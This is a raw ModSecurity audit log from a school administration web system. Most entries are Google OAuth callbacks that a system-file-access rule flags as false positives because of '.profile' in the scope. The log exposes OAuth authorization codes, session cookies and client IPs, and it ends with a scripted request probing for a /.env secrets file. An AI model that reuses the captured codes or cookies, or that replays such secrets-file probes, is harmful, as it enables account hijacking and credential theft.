cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=0ou2lq5tu0pesms1so97mkhtt1 --96b60d27-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3649 Content-Type: text/html; charset=UTF-8 --96b60d27-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||college.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||college.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "college.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHOyEdutIOpb_kg22htsAAAABg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/college.jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753337544080152 483967 (- - -) Stopwatch2: 1753337544080152 483967; combined=6106, p1=647, p2=4957, p3=322, p4=60, p5=119, sr=164, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --96b60d27-Z-- --c75f2702-A-- [24/Jul/2025:09:12:40.299674 +0300] aIHO11ooLYw4or2LgWIS3gAAANM 212.28.242.186 58578 127.0.0.1 7081 --c75f2702-B-- GET /administration/index.php?code=4/0AVMBsJirTAzqWZlZMsQry1y60fAGCT2ouTFI42Rr1F3bakJSwcH3wnVLWk2EctB-adQSGA&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Microsoft Edge";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9,ar;q=0.8 priority: u=0, i cookie: PHPSESSID=oa3ok1f92g3u312j96r10ptla2 --c75f2702-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --c75f2702-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHO11ooLYw4or2LgWIS3gAAANM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753337559906366 393538 (- - -) Stopwatch2: 1753337559906366 393538; combined=5918, p1=616, p2=4842, p3=140, p4=70, p5=249, sr=174, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c75f2702-Z-- --603f3208-A-- [24/Jul/2025:09:12:51.663714 +0300] aIHO41ooLYw4or2LgWIS6QAAAMM 212.28.242.186 35000 127.0.0.1 7081 --603f3208-B-- GET /administration/index.php?code=4/0AVMBsJgcz9xGAc6BT-pPVt5dW1mXb3OTH0yOejFgla0CnPsFsRVg5vMNcsu5PXT734ELzg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=21bpo7shvcragcdcm1a0pbtd05 --603f3208-F-- HTTP/1.1 302 Moved Temporarily Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Location: https://jinansystem.com/login.php Content-Length: 0 Content-Type: text/html; charset=UTF-8 --603f3208-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHO41ooLYw4or2LgWIS6QAAAMM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753337571654631 9255 (- - -) Stopwatch2: 1753337571654631 9255; combined=5830, p1=737, p2=4782, p3=135, p4=35, p5=140, sr=279, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --603f3208-Z-- --53030c21-A-- [24/Jul/2025:09:13:04.536349 +0300] aIHO8FooLYw4or2LgWITEAAAAMs 212.28.242.186 46834 127.0.0.1 7081 --53030c21-B-- GET /administration/index.php?code=4/0AVMBsJh0nVJVIis92vGzUY2df7wn4hWKLY6FXuY4aDVj5KO3DauhBQswiR_W2L-empvAXw&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=21bpo7shvcragcdcm1a0pbtd05 --53030c21-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --53030c21-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHO8FooLYw4or2LgWITEAAAAMs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753337584095161 441442 (- - -) Stopwatch2: 1753337584095161 441442; combined=5038, p1=805, p2=3903, p3=128, p4=55, p5=146, sr=147, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --53030c21-Z-- --1154051d-A-- [24/Jul/2025:09:15:14.726798 +0300] aIHPclooLYw4or2LgWIUxgAAAMg 141.105.87.197 55114 127.0.0.1 7081 --1154051d-B-- GET /administration/index.php?code=4/0AVMBsJghQgZBDRm5AP6T_B7N3bCsK2bWgxlrII-FWO93wrR-hQ7ZN63gtSKCvLnykNpQtQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=2&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 141.105.87.197 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br accept-language: en-US,en;q=0.9 cookie: PHPSESSID=4poic0ignrkj06q9aloqid5ug7 --1154051d-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --1154051d-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHPclooLYw4or2LgWIUxgAAAMg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753337714270615 456310 (- - -) Stopwatch2: 1753337714270615 456310; combined=8540, p1=654, p2=7563, p3=130, p4=58, p5=135, sr=209, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1154051d-Z-- --6e676640-A-- [24/Jul/2025:09:15:27.723104 +0300] aIHPf0dutIOpb_kg22hytQAAAAw 212.28.242.186 41560 127.0.0.1 7081 --6e676640-B-- GET /administration/index.php?code=4/0AVMBsJhEiEvJqeHpxwOMCKrKwiL_9QQ7kqTCDAsVS_m24GEOlUb4m0vLg7Rdl6dCVbqPew&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=kleui039c2kf5tql3k1uj7gq36 --6e676640-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --6e676640-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHPf0dutIOpb_kg22hytQAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753337727300277 423076 (- - -) Stopwatch2: 1753337727300277 423076; combined=5104, p1=598, p2=4012, p3=161, p4=83, p5=250, sr=142, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6e676640-Z-- --fcbfee02-A-- [24/Jul/2025:09:20:22.179085 +0300] aIHQpVooLYw4or2LgWIX9gAAAMQ 141.105.87.197 44826 127.0.0.1 7081 --fcbfee02-B-- GET /administration/index.php?code=4/0AVMBsJhIpCU2ecKceYoD0eyFxJa-trp4nMqXBrUw_dsXqBevJUnOeKirGbKHgUVknIi-0g&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 141.105.87.197 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 accept-language: en-US,en;q=0.5 accept-encoding: gzip, deflate, br, zstd referer: https://accounts.google.com/ upgrade-insecure-requests: 1 sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: cross-site sec-fetch-user: ?1 priority: u=0, i cookie: PHPSESSID=3r2jh4bn825hjn7g3q1dlr3r02 --fcbfee02-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --fcbfee02-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHQpVooLYw4or2LgWIX9gAAAMQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753338021726730 452517 (- - -) Stopwatch2: 1753338021726730 452517; combined=93401, p1=703, p2=4243, p3=140, p4=54, p5=44197, sr=202, sw=1, l=0, gc=44063 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fcbfee02-Z-- --0688070a-A-- [24/Jul/2025:09:21:57.397659 +0300] aIHRBEdutIOpb_kg22h8KAAAAAs 212.28.242.186 40572 127.0.0.1 7081 --0688070a-B-- GET /administration/index.php?code=4/0AVMBsJioRa3FJli7Eg-XNrmH95dz_bq7NS3iFltWpfCdPEW5ZLCrScoHIuh38HCbPeCO6A&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-GB,en-US;q=0.9,en;q=0.8 priority: u=0, i cookie: PHPSESSID=78tuoifcpm60fbteto3gk2crt4 --0688070a-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --0688070a-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHRBEdutIOpb_kg22h8KAAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753338116962645 435217 (- - -) Stopwatch2: 1753338116962645 435217; combined=6799, p1=681, p2=5760, p3=151, p4=74, p5=132, sr=235, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0688070a-Z-- --ef062047-A-- [24/Jul/2025:09:22:15.890708 +0300] aIHRF1ooLYw4or2LgWIZFwAAAMY 45.80.158.235 58190 127.0.0.1 7081 --ef062047-B-- GET /.env HTTP/1.0 Host: limitless.jac.group X-Real-IP: 45.80.158.235 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: python-requests/2.32.3 Accept-Encoding: gzip, deflate, zstd Accept: */* 